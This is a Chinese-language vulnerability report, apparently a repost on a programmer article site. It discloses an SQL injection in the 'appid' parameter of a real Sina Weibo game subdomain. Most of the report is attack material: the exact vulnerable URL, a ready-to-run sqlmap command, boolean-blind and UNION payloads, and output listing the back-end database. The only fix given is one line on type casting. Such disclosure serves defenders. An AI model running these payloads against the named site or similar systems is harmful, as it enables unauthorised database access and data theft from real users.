欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

新浪微博某分站存在SQL注入(可UNION)

程序员文章站 2022-04-02 23:49:55
新浪微博某分站存在SQL注入(可UNION) # 网站 https://game.weibo.com # 注入点,参数appid https://game.weibo.com/webg...

新浪微博某分站存在SQL注入(可UNION)

# 网站

https://game.weibo.com

# 注入点,参数appid

https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

python sqlmap.py -u "https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

    Type: UNION query
    Title: MySQL UNION query (80) - 13 columns
    Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5

available databases [1]:
[*] app_vgwebgame

解决方案:

强制类型转换